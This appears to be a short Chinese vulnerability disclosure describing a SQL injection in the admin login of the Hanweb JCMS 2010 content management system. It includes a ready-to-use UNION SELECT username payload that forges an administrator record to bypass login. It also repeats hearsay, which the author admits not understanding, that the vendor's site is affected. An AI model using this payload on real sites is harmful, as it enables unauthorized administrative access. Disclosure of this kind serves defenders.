### 简要描述:
大汉版通JCMS内容管理系统某处参数未经处理即入库查询导致SQL注射漏洞产生,可利用来登录后台等,当前测试存在该漏洞的版本为JCMS2010。
### 详细说明:
1. 大汉版通JCMS内容管理系统(JCMS2010)默认后台登录页中由于用户名未经处理即带入数据库查询产生SQL注射漏洞。
2. 利用测试:
后台登录页:http://www.target.com/jcms/
用户名:x' union select '00000','admin','AEY=',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'1',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--
密码:1
其中'00000'是验证管理员用户组的一个字段;'admin'是管理员用户名;'AEY='加密密码,解密后为'1';后面的'1'表示帐号启用。
### 漏洞证明:
我不大清楚,别人说是这么回事,说厂家官网也存在这个漏洞:
[<img src="https://images.seebug.org/upload/201309/18180153f376bf6388d2390649b64808fb6e3744.jpg" alt="hanweb.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/18180153f376bf6388d2390649b64808fb6e3744.jpg)
暂无评论